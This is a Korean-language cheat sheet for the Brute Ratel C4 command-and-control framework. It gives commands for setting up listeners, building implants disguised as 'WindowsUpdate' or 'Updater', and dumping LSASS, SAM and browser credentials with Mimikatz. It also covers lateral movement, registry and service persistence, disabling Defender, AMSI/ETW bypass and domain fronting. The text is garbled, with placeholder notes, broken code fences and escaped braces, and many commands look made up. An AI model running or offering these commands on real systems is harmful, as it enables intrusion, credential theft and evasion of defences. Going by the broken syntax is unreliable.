콘텐츠로 이동

Brute Ratel C4 프레임워크 치트 시트

개요

Brute Ratel C4 (BRc4)는 레드팀 작전 및 적대적 시뮬레이션을 위해 설계된 상용 맞춤형 명령 및 제어(C2) 프레임워크입니다. 고급 회피 기능, 정교한 사후 익스플로이트 기능 및 전문적인 운영 보안을 제공합니다.

⚠️ 경고: 이는 유효한 라이선스가 필요한 상용 도구입니다. 이 도구는 승인된 침투 테스트 및 레드팀 연습용으로만 사용됩니다. 모든 환경에서 사용하기 전에 적절한 승인을 받았는지 확인하세요.

설치

라이선스 활성화

# Activate license (requires valid license key)
./brc4 --activate <license-key>

# Verify license status
./brc4 --license-info

# Update license
./brc4 --update-license
```[라이선스 활성화 관련 내용 필요]

### 서버 설정
```bash
# Start BRc4 server
./brc4 --server

# Start with custom configuration
./brc4 --server --config /path/to/config.json

# Start with specific interface
./brc4 --server --interface 0.0.0.0 --port 443
```[서버 설정 관련 내용 필요]

### 클라이언트 연결
```bash
# Connect to server
./brc4 --client --server 192.168.1.100:443

# Connect with authentication
./brc4 --client --server 192.168.1.100:443 --auth-token <token>
```[클라이언트 연결 관련 내용 필요]

## 명령 참조

### 서버 관리
| 명령어 | 설명 |
|---------|-------------|
| `help` | 도움말 메뉴 표시 |
| `version` | 버전 정보 표시 |
| `listeners` | 활성 리스너 목록 |
| `badgers` | 연결된 배지(에이전트) 목록 |
| `operators` | 연결된 연산자 목록 |
| `exit` | BRc4 서버 종료 |[서버 관리 관련 내용 필요]
### 리스너 관리
| 명령어 | 설명 |
|---------|-------------|
| `listener http` | HTTP 리스너 생성 |
| `listener https` | HTTPS 리스너 생성 |
| `listener dns` | DNS 리스너 생성 |
| `listener tcp` | TCP 리스너 생성 |
| `listener smb` | SMB 리스너 생성 |
| `listener stop <id>` | 리스너 중지 |[리스너 관리 관련 내용 필요]
### 배저(에이전트) 관리
| 명령어 | 설명 |
|---------|-------------|
| `badger <id>` | badger와 상호작용하기 |
| `badger kill <id>` | 오소리 죽이기 |
| `badger sleep <time>` | 수면 간격 설정 |
| `badger jitter <percentage>` | 지터 비율 설정 |
| `badger proxy <proxy>` | Badger의 프록시 설정 |[배저 관리 관련 내용 필요]
## 리스너 구성

### HTTP/HTTPS 리스너
```bash
# Create HTTPS listener
listener https
set host 0.0.0.0
set port 443
set cert /path/to/cert.pem
set key /path/to/key.pem
set malleable /path/to/profile.profile
start

# Create HTTP listener with domain fronting
listener http
set host 0.0.0.0
set port 80
set front-domain cdn.example.com
set host-header legitimate-site.com
start
```[HTTP/HTTPS 리스너 관련 내용 필요]

### DNS 리스너
```bash
# Create DNS listener
listener dns
set domain example.com
set nameserver ns1.example.com
set port 53
start
```[DNS 리스너 관련 내용 필요]

### SMB 리스너
```bash
# Create SMB listener
listener smb
set pipename msagent_pipe
set host 0.0.0.0
set port 445
start
```[SMB 리스너 관련 내용 필요]

### TCP 리스너
```bash
# Create TCP listener
listener tcp
set host 0.0.0.0
set port 4444
set bind true
start
```[TCP 리스너 관련 내용 필요]

## 배저 생성

### Windows 배저
```bash
# Generate Windows executable
generate windows exe
set listener https-443
set arch x64
set format exe
set output windows_badger.exe
generate

# Generate Windows DLL
generate windows dll
set listener https-443
set arch x64
set format dll
set output windows_badger.dll
generate

# Generate Windows service
generate windows service
set listener https-443
set arch x64
set service-name "WindowsUpdate"
set output windows_service.exe
generate
```[Windows 배저 관련 내용 필요]

### Linux 배저
```bash
# Generate Linux ELF
generate linux elf
set listener https-443
set arch x64
set format elf
set output linux_badger
generate

# Generate Linux shared library
generate linux so
set listener https-443
set arch x64
set format so
set output linux_badger.so
generate
```[Linux 배저 관련 내용 필요]

### macOS 배저
```bash
# Generate macOS binary
generate macos macho
set listener https-443
set arch x64
set format macho
set output macos_badger
generate

# Generate macOS application
generate macos app
set listener https-443
set arch x64
set app-name "Updater"
set output macos_app.app
generate
```[macOS 배저 관련 내용 필요]

## 사후 익스플로이트 명령

### 시스템 정보
```bash
# Get system information
sysinfo

# Get current user
whoami

# Get privileges
getprivs

# Get environment variables
env

# Get network interfaces
ifconfig
```[시스템 정보 관련 내용 필요]

### 파일 작업
```bash
# List directory
ls /path/to/directory

# Change directory
cd /path/to/directory

# Download file
download /remote/path/file.txt

# Upload file
upload /local/path/file.txt /remote/path/

# Execute file
execute /path/to/executable

# Delete file
rm /path/to/file
```[파일 작업 관련 내용 필요]

### 프로세스 관리
```bash
# List processes
ps

# Kill process
kill <pid>

# Migrate to process
migrate <pid>

# Inject into process
inject <pid> <payload>

# Create process
spawn <executable>
```[프로세스 관리 관련 내용 필요]

### 네트워크 작업
```bash
# Network connections
netstat

# ARP table
arp

# Routing table
route

# Port scan
portscan 192.168.1.0/24 80,443,3389

# Ping sweep
ping 192.168.1.0/24
```[네트워크 작업 관련 내용 필요]

## 고급 기능

### 변형 가능한 C2 프로필
```bash
# Load malleable profile
set malleable /path/to/profile.profile

# Custom HTTP profile
http-get \\\\{
    set uri "/api/v1/status";
    client \\\\{
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";
        header "Accept" "application/json";
    \\\\}
    server \\\\{
        header "Content-Type" "application/json";
        output \\\\{
            print;
        \\\\}
    \\\\}
\\\\}
```[변형 가능한 C2 프로필 관련 내용 필요]

### 프로세스 주입 기술

[프로세스 주입 기술 관련 내용 필요]```bash
# Classic DLL injection
inject-dll <pid> /path/to/dll.dll

# Process hollowing
hollow <target-process> <payload>

# Reflective DLL loading
reflective-dll /path/to/dll.dll

# Manual DLL mapping
map-dll <pid> /path/to/dll.dll

# Thread hijacking
hijack-thread <pid> <payload>

Credential Harvesting

# Dump LSASS
lsass-dump

# Mimikatz integration
mimikatz sekurlsa::logonpasswords

# SAM dump
sam-dump

# LSA secrets
lsa-secrets

# Cached credentials
cache-dump

# Browser credentials
browser-creds

Lateral Movement

# WMI execution
wmi-exec 192.168.1.10 "whoami"

# PSExec
psexec 192.168.1.10 "whoami"

# SMB execution
smb-exec 192.168.1.10 "whoami"

# DCOM execution
dcom-exec 192.168.1.10 "whoami"

# WinRM execution
winrm-exec 192.168.1.10 "whoami"

Persistence Mechanisms

# Registry persistence
persist-registry HKCU "Software\Microsoft\Windows\CurrentVersion\Run" "Update" "C:\temp\badger.exe"

# Scheduled task
persist-task "WindowsUpdate" "C:\temp\badger.exe" daily

# Service persistence
persist-service "UpdateService" "C:\temp\badger.exe"

# WMI persistence
persist-wmi "ProcessStart" "C:\temp\badger.exe"

# Startup folder
persist-startup "C:\temp\badger.exe"

Evasion Techniques

Anti-Analysis

# VM detection
vm-detect

# Sandbox evasion
sandbox-evasion

# Debugger detection
debugger-detect

# Sleep evasion
sleep-evasion 300

# User interaction check
user-interaction

AMSI/ETW Bypass

# AMSI bypass
amsi-bypass

# ETW bypass
etw-bypass

# Disable Windows Defender
disable-defender

# Unhook DLLs
unhook-dlls

# Patch AMSI
patch-amsi

Traffic Obfuscation

# Domain fronting
set front-domain cdn.cloudflare.com
set host-header legitimate-site.com

# Custom User-Agent
set user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set headers "X-Forwarded-For: 192.168.1.100"

# Proxy chains
set proxy-chain "http://proxy1:8080,socks5://proxy2:1080"

Payload Obfuscation

# Encrypt payload
encrypt-payload aes256 <key>

# Obfuscate strings
obfuscate-strings

# Pack executable
pack-exe upx

# Sign executable
sign-exe /path/to/cert.pfx

# Polymorphic generation
polymorphic-gen

Operational Security

Communication Security

# Use encrypted channels
set encryption aes256

# Certificate pinning
set cert-pinning true

# Custom TLS configuration
set tls-version 1.3
set cipher-suite ECDHE-RSA-AES256-GCM-SHA384

# Jitter configuration
set jitter 20
set jitter-type random

Infrastructure Management

# Redirector setup
set redirector nginx
set upstream-server 192.168.1.100:443

# Load balancing
set load-balancer round-robin
set backend-servers "192.168.1.100,192.168.1.101"

# Failover configuration
set failover-servers "backup1.com,backup2.com"

Logging and Monitoring

# Enable detailed logging
set log-level debug
set log-file /var/log/brc4.log

# Operator tracking
set operator-logging true

# Command auditing
set command-audit true

# Session recording
set session-recording true

Team Operations

Multi-Operator Support

# Add operator
operator add username password

# Set operator permissions
operator permissions username read,write,execute

# Operator sessions
operator sessions

# Kick operator
operator kick username

Collaboration Features

# Share badger session
share-session <badger-id> <operator>

# Session notes
note-add "Important finding"
note-list
note-delete <note-id>

# Team chat
chat "Message to team"
chat-history

Troubleshooting

Connection Issues

# Test listener
test-listener <listener-id>

# Check connectivity
test-connectivity <target>

# Verify certificates
verify-cert /path/to/cert.pem

# Debug mode
set debug true

Badger Issues

# Badger health check
health-check <badger-id>

# Reset badger
reset-badger <badger-id>

# Badger diagnostics
diagnostics <badger-id>

# Force reconnect
reconnect <badger-id>

Performance Optimization

# Optimize sleep intervals
set sleep-optimization true

# Bandwidth throttling
set bandwidth-limit 1024

# Connection pooling
set connection-pooling true

# Compression
set compression gzip

Configuration

Server Configuration

\\\\{
  "server": \\\\{
    "host": "0.0.0.0",
    "port": 443,
    "ssl": true,
    "cert": "/path/to/cert.pem",
    "key": "/path/to/key.pem"
  \\\\},
  "database": \\\\{
    "type": "sqlite",
    "path": "/opt/brc4/database.db"
  \\\\},
  "logging": \\\\{
    "level": "info",
    "file": "/var/log/brc4.log"
  \\\\}
\\\\}

Malleable Profile

# Custom malleable profile
set sample_name "Custom Profile";
set sleeptime "30000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)";

http-get \\\\{
    set uri "/api/status";
    client \\\\{
        header "Accept" "application/json";
        header "Accept-Language" "en-US,en;q=0.9";
    \\\\}
    server \\\\{
        header "Content-Type" "application/json";
        output \\\\{
            print;
        \\\\}
    \\\\}
\\\\}

Resources

이 치트 시트는 Brute Ratel C4 사용에 대한 포괄적인 참조를 제공합니다. 이는 적절한 라이선스가 필요한 상용 도구입니다. 어떤 환경에서든 이 도구를 사용하기 전에 항상 적절한 승인을 받았는지 확인하세요.